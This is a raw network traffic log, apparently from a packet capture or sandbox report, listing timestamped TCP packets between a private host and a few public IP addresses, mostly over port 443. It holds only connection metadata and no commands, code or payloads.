Nov 21, 2024 22:13:13.038933039 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.040040016 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.040050030 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.040110111 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.040123940 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048321962 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048367023 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048402071 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.048410892 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048444033 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.048481941 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.048515081 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048791885 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048814058 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048845053 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048851013 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.048861980 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.048890114 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.054292917 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.054356098 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.054366112 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.056839943 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.056879997 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.056945086 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.056953907 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.057002068 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.062294006 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.062313080 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.062345982 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.062355042 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.062381983 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.067192078 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.067234993 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.067256927 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.067265034 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.067291021 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.067308903 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.067354918 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.067363977 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.067405939 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.067414999 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.067433119 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.075201988 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.075221062 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.075270891 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.075305939 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.075326920 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.075697899 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.075737000 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.075766087 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.075773954 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.075794935 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.079648972 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.079720974 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.079732895 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.090619087 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.090641975 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.090790987 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.090790987 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.090806007 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.090842962 CET	80	50033	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:13.092807055 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.092854977 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.092895031 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.092907906 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.092933893 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.092941999 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.099008083 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:13.101984978 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.102010965 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.102029085 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.102078915 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.102087021 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.102107048 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.102116108 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.102138042 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.102137089 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.102157116 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.102159023 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.102206945 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.106419086 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.106437922 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.106580019 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.106580019 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.106610060 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.106654882 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.109235048 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.109286070 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.109317064 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.109325886 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.109363079 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.113964081 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.113982916 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.114022017 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.114049911 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.114064932 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.114078999 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.114104986 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.115077019 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.115340948 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.119055986 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.119199991 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.119216919 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.119571924 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.119590044 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.119628906 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.119642019 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.119680882 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.123471022 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.123533964 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.123547077 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.123939991 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:13.123950958 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:13.123975992 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:13.123986959 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:13.124012947 CET	50025	443	192.168.2.5	152.195.19.97
Nov 21, 2024 22:13:13.124062061 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:13.124089003 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:13.124119997 CET	50025	443	192.168.2.5	152.195.19.97
Nov 21, 2024 22:13:13.124144077 CET	50025	443	192.168.2.5	152.195.19.97
Nov 21, 2024 22:13:13.124658108 CET	50025	443	192.168.2.5	152.195.19.97
Nov 21, 2024 22:13:13.124687910 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:13.179379940 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.179384947 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.179398060 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.210882902 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.210903883 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.210974932 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.210988045 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.211138964 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.220635891 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.220654964 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.220694065 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.220712900 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.220726967 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.220733881 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.220797062 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.220803976 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.223043919 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243055105 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243073940 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243112087 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243238926 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243238926 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243247986 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243362904 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243442059 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243484974 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243515968 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243522882 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243551016 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243753910 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243769884 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243788958 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243815899 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243819952 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243820906 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243822098 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.243856907 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.243866920 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.244093895 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.244151115 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.244158030 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.244160891 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.244206905 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.244215965 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.244234085 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.244241953 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.244268894 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.251324892 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.251344919 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.251414061 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.251422882 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.251455069 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.251512051 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.251552105 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.251581907 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.251590014 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.251615047 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.251643896 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.251648903 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.254550934 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.254616022 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.254622936 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.258219957 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.258269072 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.258312941 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.258320093 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.258353949 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.259598970 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.259799004 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.260133982 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.260154963 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.261279106 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.261301994 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.261336088 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.261347055 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.261379957 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.265841007 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.265899897 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.265908957 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.274595022 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.274614096 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.274666071 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.274677992 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.274688959 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.277173042 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.277328014 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.277337074 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.308345079 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.308363914 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.308478117 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.308478117 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.308490038 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.311295986 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.311359882 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.311367989 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.424586058 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.424619913 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.424680948 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.424714088 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.424729109 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.429153919 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.429164886 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.429234028 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.429244995 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.436379910 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.436391115 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.436408043 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.436417103 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.436460972 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.436472893 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.436496973 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.441018105 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.441049099 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.441107035 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.441116095 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.441162109 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.448326111 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.448353052 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.448389053 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.448395014 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.448402882 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.448451042 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.452977896 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.453049898 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.453058004 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.453154087 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.460834026 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.460897923 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.460930109 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.460937023 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.460972071 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.460978985 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.464333057 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.464400053 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.464406013 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.472520113 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.472562075 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.472589016 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.472595930 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.472625017 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.500535965 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.500605106 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.500617027 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.614141941 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.614187002 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.614217997 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.614231110 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.614280939 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.617376089 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.617396116 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.617412090 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.617454052 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.617495060 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.617499113 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.617546082 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.624538898 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.624558926 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.624599934 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.624603033 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.624630928 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.624635935 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.624655962 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.624661922 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.626604080 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.629108906 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.629185915 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.629194021 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.636262894 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.636321068 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.636332035 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.636347055 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.636383057 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.640892029 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.640958071 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.640965939 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.649211884 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.649270058 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.649282932 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.649305105 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.649331093 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.652265072 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.652345896 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.652353048 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.660376072 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.660403967 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.660443068 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.660451889 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.660479069 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.663853884 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.663909912 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.663916111 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.696966887 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.697043896 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.697055101 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.697104931 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.697118044 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.734842062 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.735230923 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.735244989 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.736033916 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.736110926 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.737065077 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.739033937 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.739990950 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.740068913 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.740201950 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.740206957 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.740222931 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.787374973 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.789793015 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.789796114 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.806570053 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.806598902 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.806616068 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.806715965 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.806715965 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.806730986 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.814140081 CET	443	50013	23.44.203.17	192.168.2.5
